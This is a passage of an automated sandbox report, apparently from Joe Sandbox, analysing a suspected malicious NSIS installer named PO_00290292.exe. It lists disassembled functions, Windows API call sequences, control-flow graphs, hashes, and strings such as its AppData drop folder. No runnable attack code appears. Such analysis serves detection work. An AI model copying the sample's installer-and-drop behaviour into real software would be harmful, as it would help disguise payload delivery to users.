                                                                  • Instruction Fuzzy Hash: 5A41B530A40914A6CB21AB659CC9AAF7678EF41724F20427FF801711D1D77C5986DE6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406846 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                                  • Instruction ID: 84f5b91c3f937eb173619b21672ae23043901769df73ed9f159891f0fc81c8d0
                                                                  • Opcode Fuzzy Hash: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                                  • Instruction Fuzzy Hash: 72F18671D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7385A8ACF45
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004064C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405C83,00425F30,00425F30,00000000,00425F30,00425F30, 4Wu.Wu,?,75572EE0,0040598F,?,75573420,75572EE0), ref: 004064CC
                                                                  • FindClose.KERNELBASE(00000000), ref: 004064D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID: xgB
                                                                  • API String ID: 2295610775-399326502
                                                                  • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                                  • Instruction ID: 909a2899cbbcfc21b24ab628f9350e7a3c7b3772aa6d432f74911df6ac2d0bb5
                                                                  • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                                  • Instruction Fuzzy Hash: 8BD0C9315045209BC2111778AE4C85B7A98AF553317628A36B466F12A0C674CC22869C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: 760ba12aea5bac669ea06a92ce868f6cfbbc58d79179603cd607c726fd559e33
                                                                  • Instruction ID: ca82d2f7608ddbe9a9db451b4e667c54ef54e9945bbc135f2cbc761c4928cd6d
                                                                  • Opcode Fuzzy Hash: 760ba12aea5bac669ea06a92ce868f6cfbbc58d79179603cd607c726fd559e33
                                                                  • Instruction Fuzzy Hash: 3CF08275600114DBC711EBE4DD49AAEB374FF00324F2045BBE105F31E1D7B499559B2A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403D6A Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 182 403d6a-403d7c 183 403d82-403d88 182->183 184 403ebd-403ecc 182->184 183->184 185 403d8e-403d97 183->185 186 403f1b-403f30 184->186 187 403ece-403f16 GetDlgItem * 2 call 404242 SetClassLongW call 40140b 184->187 188 403d99-403da6 SetWindowPos 185->188 189 403dac-403daf 185->189 191 403f70-403f75 call 40428e 186->191 192 403f32-403f35 186->192 187->186 188->189 194 403db1-403dc3 ShowWindow 189->194 195 403dc9-403dcf 189->195 200 403f7a-403f95 191->200 197 403f37-403f42 call 401389 192->197 198 403f68-403f6a 192->198 194->195 201 403dd1-403de6 DestroyWindow 195->201 202 403deb-403dee 195->202 197->198 219 403f44-403f63 SendMessageW 197->219 198->191 199 40420f 198->199 207 404211-404218 199->207 205 403f97-403f99 call 40140b 200->205 206 403f9e-403fa4 200->206 208 4041ec-4041f2 201->208 210 403df0-403dfc SetWindowLongW 202->210 211 403e01-403e07 202->211 205->206 215 403faa-403fb5 206->215 216 4041cd-4041e6 DestroyWindow EndDialog 206->216 208->199 213 4041f4-4041fa 208->213 210->207 217 403eaa-403eb8 call 4042a9 211->217 218 403e0d-403e1e GetDlgItem 211->218 213->199 221 4041fc-404205 ShowWindow 213->221 215->216 222 403fbb-404008 call 4061a0 call 404242 * 3 GetDlgItem 215->222 216->208 217->207 223 403e20-403e37 SendMessageW IsWindowEnabled 218->223 224 403e3d-403e40 218->224 219->207 221->199 252 404012-40404e ShowWindow KiUserCallbackDispatcher call 404264 EnableWindow 222->252 253 40400a-40400f 222->253 223->199 223->224 227 403e42-403e43 224->227 228 403e45-403e48 224->228 232 403e73-403e78 call 40421b 227->232 229 403e56-403e5b 228->229 230 403e4a-403e50 228->230 233 403e91-403ea4 SendMessageW 229->233 235 403e5d-403e63 229->235 230->233 234 403e52-403e54 230->234 232->217 233->217 234->232 238 403e65-403e6b call 40140b 235->238 239 403e7a-403e83 call 40140b 235->239 248 403e71 238->248 239->217 249 403e85-403e8f 239->249 248->232 249->248 256 404050-404051 252->256 257 404053 252->257 253->252 258 404055-404083 GetSystemMenu EnableMenuItem SendMessageW 256->258 257->258 259 404085-404096 SendMessageW 258->259 260 404098 258->260 261 40409e-4040dc call 404277 call 40617e lstrlenW call 4061a0 SetWindowTextW call 401389 259->261 260->261 261->200 270 4040e2-4040e4 261->270 270->200 271 4040ea-4040ee 270->271 272 4040f0-4040f6 271->272 273 40410d-404121 DestroyWindow 271->273 272->199 274 4040fc-404102 272->274 273->208 275 404127-404154 CreateDialogParamW 273->275 274->200 276 404108 274->276 275->208 277 40415a-4041b1 call 404242 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 275->277 276->199 277->199 282 4041b3-4041c6 ShowWindow call 40428e 277->282 284 4041cb 282->284 284->208
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DA6
                                                                  • ShowWindow.USER32(?), ref: 00403DC3
                                                                  • DestroyWindow.USER32 ref: 00403DD7
                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF3
                                                                  • GetDlgItem.USER32(?,?), ref: 00403E14
                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E28
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403E2F
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403EDD
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403EE7
                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403F01
                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F52
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FF8
                                                                  • ShowWindow.USER32(00000000,?), ref: 00404019
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040402B
                                                                  • EnableWindow.USER32(?,?), ref: 00404046
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040405C
                                                                  • EnableMenuItem.USER32(00000000), ref: 00404063
                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040407B
                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040408E
                                                                  • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 004040B7
                                                                  • SetWindowTextW.USER32(?,00423728), ref: 004040CB
                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID: (7B
                                                                  • API String ID: 3282139019-3251261122
                                                                  • Opcode ID: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                                  • Instruction ID: 4530f9416eb169af0d44378ddba5762a1eee688012323a74912104aead4a3b33
                                                                  • Opcode Fuzzy Hash: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                                  • Instruction Fuzzy Hash: A5C1FFB1640200FFCB206F61EE84E2B3AA8EB95745F40057EF641B21F1CB7999529B6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004039C7 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 285 4039c7-4039df call 406558 288 4039e1-4039f1 call 4060c5 285->288 289 4039f3-403a2a call 40604b 285->289 297 403a4d-403a76 call 403c9d call 405c3a 288->297 293 403a42-403a48 lstrcatW 289->293 294 403a2c-403a3d call 40604b 289->294 293->297 294->293 303 403b08-403b10 call 405c3a 297->303 304 403a7c-403a81 297->304 310 403b12-403b19 call 4061a0 303->310 311 403b1e-403b43 LoadImageW 303->311 304->303 305 403a87-403aaf call 40604b 304->305 305->303 314 403ab1-403ab5 305->314 310->311 312 403bc4-403bcc call 40140b 311->312 313 403b45-403b75 RegisterClassW 311->313 328 403bd6-403be1 call 403c9d 312->328 329 403bce-403bd1 312->329 316 403c93 313->316 317 403b7b-403bbf SystemParametersInfoW CreateWindowExW 313->317 319 403ac7-403ad3 lstrlenW 314->319 320 403ab7-403ac4 call 405b5f 314->320 321 403c95-403c9c 316->321 317->312 322 403ad5-403ae3 lstrcmpiW 319->322 323 403afb-403b03 call 405b32 call 40617e 319->323 320->319 322->323 327 403ae5-403aef GetFileAttributesW 322->327 323->303 331 403af1-403af3 327->331 332 403af5-403af6 call 405b7e 327->332 338 403be7-403c01 ShowWindow call 4064e8 328->338 339 403c6a-403c6b call 4053b0 328->339 329->321 331->323 331->332 332->323 346 403c03-403c08 call 4064e8 338->346 347 403c0d-403c1f GetClassInfoW 338->347 342 403c70-403c72 339->342 344 403c74-403c7a 342->344 345 403c8c-403c8e call 40140b 342->345 344->329 350 403c80-403c87 call 40140b 344->350 345->316 346->347 348 403c21-403c31 GetClassInfoW RegisterClassW 347->348 349 403c37-403c5a DialogBoxParamW call 40140b 347->349 348->349 355 403c5f-403c68 call 403917 349->355 350->329 355->321
                                                                  APIs
                                                                    • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                                    • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                                  • lstrcatW.KERNEL32(1033,00423728), ref: 00403A48
                                                                  • lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,75573420), ref: 00403AC8
                                                                  • lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403ADB
                                                                  • GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403AE6
                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement), ref: 00403B2F
                                                                    • Part of subcall function 004060C5: wsprintfW.USER32 ref: 004060D2
                                                                  • RegisterClassW.USER32(004291E0), ref: 00403B6C
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B84
                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BB9
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403BEF
                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403C1B
                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403C28
                                                                  • RegisterClassW.USER32(004291E0), ref: 00403C31
                                                                  • DialogBoxParamW.USER32(?,00000000,00403D6A,00000000), ref: 00403C50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                  • API String ID: 1975747703-3822136923
                                                                  • Opcode ID: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                                  • Instruction ID: e7f44595d902892b35b801f2f0c3734befc0b18a393fec54347386a87508d522
                                                                  • Opcode Fuzzy Hash: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                                  • Instruction Fuzzy Hash: 8661C570244200BAD730AF669D49E2B3A7CEB84B49F40453FF981B62E2DB7D5912C63D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402E41 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 203memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 359 402e41-402e8f GetTickCount GetModuleFileNameW call 405d53 362 402e91-402e96 359->362 363 402e9b-402ec9 call 40617e call 405b7e call 40617e GetFileSize 359->363 364 4030e0-4030e4 362->364 371 402fb9-402fc7 call 402d9f 363->371 372 402ecf-402ee6 363->372 379 403098-40309d 371->379 380 402fcd-402fd0 371->380 374 402ee8 372->374 375 402eea-402ef7 call 403358 372->375 374->375 381 403054-40305c call 402d9f 375->381 382 402efd-402f03 375->382 379->364 383 402fd2-402fea call 40336e call 403358 380->383 384 402ffc-403048 GlobalAlloc call 406677 call 405d82 CreateFileW 380->384 381->379 385 402f83-402f87 382->385 386 402f05-402f1d call 405d0e 382->386 383->379 407 402ff0-402ff6 383->407 410 40304a-40304f 384->410 411 40305e-40308e call 40336e call 4030e7 384->411 390 402f90-402f96 385->390 391 402f89-402f8f call 402d9f 385->391 386->390 405 402f1f-402f26 386->405 398 402f98-402fa6 call 406609 390->398 399 402fa9-402fb3 390->399 391->390 398->399 399->371 399->372 405->390 409 402f28-402f2f 405->409 407->379 407->384 409->390 412 402f31-402f38 409->412 410->364 418 403093-403096 411->418 412->390 414 402f3a-402f41 412->414 414->390 416 402f43-402f63 414->416 416->379 419 402f69-402f6d 416->419 418->379 420 40309f-4030b0 418->420 421 402f75-402f7d 419->421 422 402f6f-402f73 419->422 423 4030b2 420->423 424 4030b8-4030bd 420->424 421->390 425 402f7f-402f81 421->425 422->371 422->421 423->424 426 4030be-4030c4 424->426 425->390 426->426 427 4030c6-4030de call 405d0e 426->427 427->364
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402E55
                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO_00290292.exe,00000400), ref: 00402E71
                                                                    • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00405D57
                                                                    • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO_00290292.exe,C:\Users\user\Desktop\PO_00290292.exe,80000000,00000003), ref: 00402EBA
                                                                  • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403001
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO_00290292.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$x~
                                                                  • API String ID: 2803837635-2767144313
                                                                  • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                                  • Instruction ID: e866f1dd798e5fb15c0a347603bcfded6ce2f229c2e481af73dd86df93422dd6
                                                                  • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                                  • Instruction Fuzzy Hash: 9761C431A00215ABDB209F75DD49B9E7BB8EB00359F20817FF500F62D1DABD9A448B5D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 556 401767-40178c call 402bbf call 405ba9 561 401796-4017a8 call 40617e call 405b32 lstrcatW 556->561 562 40178e-401794 call 40617e 556->562 567 4017ad-4017ae call 406412 561->567 562->567 571 4017b3-4017b7 567->571 572 4017b9-4017c3 call 4064c1 571->572 573 4017ea-4017ed 571->573 581 4017d5-4017e7 572->581 582 4017c5-4017d3 CompareFileTime 572->582 575 4017f5-401811 call 405d53 573->575 576 4017ef-4017f0 call 405d2e 573->576 583 401813-401816 575->583 584 401885-4018ae call 4052dd call 4030e7 575->584 576->575 581->573 582->581 585 401867-401871 call 4052dd 583->585 586 401818-401856 call 40617e * 2 call 4061a0 call 40617e call 4058c3 583->586 598 4018b0-4018b4 584->598 599 4018b6-4018c2 SetFileTime 584->599 596 40187a-401880 585->596 586->571 619 40185c-40185d 586->619 600 402a55 596->600 598->599 602 4018c8-4018d3 FindCloseChangeNotification 598->602 599->602 603 402a57-402a5b 600->603 605 4018d9-4018dc 602->605 606 402a4c-402a4f 602->606 607 4018f1-4018f4 call 4061a0 605->607 608 4018de-4018ef call 4061a0 lstrcatW 605->608 606->600 614 4018f9-40228d call 4058c3 607->614 608->614 614->603 614->606 619->596 620 40185f-401860 619->620 620->585
                                                                  APIs
                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                  • CompareFileTime.KERNEL32(-00000014,?,%derivering%\gadedrenges,%derivering%\gadedrenges,00000000,00000000,%derivering%\gadedrenges,C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement,?,?,00000031), ref: 004017CD
                                                                    • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                    • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                    • Part of subcall function 004052DD: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00402E19), ref: 00405338
                                                                    • Part of subcall function 004052DD: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\), ref: 0040534A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                    • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                  Strings
                                                                  Memory Dump Source
